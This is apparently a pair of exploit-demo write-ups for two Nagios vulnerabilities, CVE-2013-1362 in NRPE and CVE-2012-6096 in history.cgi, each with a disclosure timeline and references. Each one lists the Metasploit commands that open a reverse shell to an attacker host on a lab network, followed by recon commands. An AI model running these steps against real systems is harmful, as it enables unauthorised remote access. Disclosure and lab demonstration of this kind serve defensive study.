CVE-2013-1362 Nagios Remote Plugin Executor Arbitrary Command Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Rudolph Pereira
Vulnerability patched by vendor the 2012-12-21
Vulnerability publicly disclosed by Rudolph Pereira the 2013-02-21
Metasploit PoC provided the 2013-03-19

PoC provided by :

Rudolph Pereira
jwpari

Reference(s) :

CVE-2013-1362
OSVDB-90582
BID-58142

Affected version(s) :

Nagios Remote Plugin Executor (NRPE) prior to 2.14

Tested on Ubuntu 12.10 x86 with :

Nagios Remote Plugin Executor (NRPE) 2.13

Description :

The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.

Commands :

use exploit/linux/misc/nagios_nrpe_arguments
set RHOST 192.168.178.54
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.36
exploit

id
uname -a
ifconfig

CVE-2012-6096 Nagios3 history.cgi Vulnerability Metasploit Demo

Timeline :

Vulnerability reported on Full Disclosure by Aris temp66 the 2012-12-09
PoC provided by blasty the 2013-01-10
Metasploit PoC provided the 2013-01-15

PoC provided by :

Unknown (temp66)
blasty
Jose Selvi
Daniele Martini

Reference(s) :

CVE-2012-6096
OSVDB-88322
BID-56879
Full Disclosure

Affected version(s) :

Nagios 3.4.3 and previous

Tested on Debian 5.0.10 with :

nagios3_3.0.6-4~lenny2_i386.deb

Description :

This module abuses a command injection vulnerability in the Nagios3 history.cgi script. An alert show exist in history.cgi web page.

Commands :

use exploit/unix/webapp/nagios3_history_cgi
set RHOST 192.168.178.44
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo